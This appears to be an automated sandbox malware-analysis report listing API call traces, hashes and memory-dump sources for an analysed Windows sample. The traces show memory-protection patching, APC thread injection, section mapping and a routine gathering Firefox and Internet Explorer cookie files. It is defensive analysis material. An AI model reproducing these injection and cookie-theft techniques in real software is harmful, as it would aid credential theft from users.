  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 6
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-3916222277
  • Opcode ID: 5d54db91bb8872728a7f338422e6e2575366b81ba5fa63999995d3bab01c6a8b
  • Instruction ID: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
  • Opcode Fuzzy Hash: 6C01CE6A618AC256DC3774402413ED2E544DF837C2D4C36339BAB2363F1B813246B70D
  • Instruction Fuzzy Hash: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
APIs
    • Part of subcall function 001DA12F: lstrcmp.KERNEL32(?,00000000), ref: 001DA1E4
    • Part of subcall function 001DA12F: lstrlen.KERNEL32(?,00000001,00000000,?), ref: 001DA1EF
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
  • GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001D799E: lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001D799E: lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
    • Part of subcall function 001D799E: StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
    • Part of subcall function 001D799E: GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
  • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D8479: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,001EB220), ref: 001D8490
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 3
  • API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx
  • String ID:
  • API String ID: 567273588-0
  • Opcode ID: ab5aec27645f8af340170e833bba8119d55850c0883528ab0e192ea95400f4cf
  • Instruction ID: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
  • Opcode Fuzzy Hash: 1A0149B715154283E0BF24D4CA047BE9A4DDB906DAACC6A47FE15705885A0FD6C03FC1
  • Instruction Fuzzy Hash: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
APIs
  • SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
  • HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
  • ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
  • LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
    • Part of subcall function 001CE2B9: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE2C2
    • Part of subcall function 001CE2B9: Sleep.KERNEL32(0000000A,?,001EB068,?,00000000,001C13EB), ref: 001CE2CC
    • Part of subcall function 001CE2B9: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE2F7
    • Part of subcall function 001DAB1D: RtlLeaveCriticalSection.NTDLL(001EAFF4), ref: 001DAB5B
    • Part of subcall function 001DAB1D: HeapFree.KERNEL32(00000000,001EAFF4), ref: 001DAB6A
    • Part of subcall function 001D80C6: GetVersion.KERNEL32(001EB068,00000000,001E51C0,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80EA
    • Part of subcall function 001D80C6: GetModuleHandleA.KERNEL32(001EC8C6,001ED08E,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80FE
    • Part of subcall function 001D80C6: GetProcAddress.KERNEL32(00000000,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D8105
    • Part of subcall function 001D7EEA: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7EF4
    • Part of subcall function 001D7EEA: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7F30
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
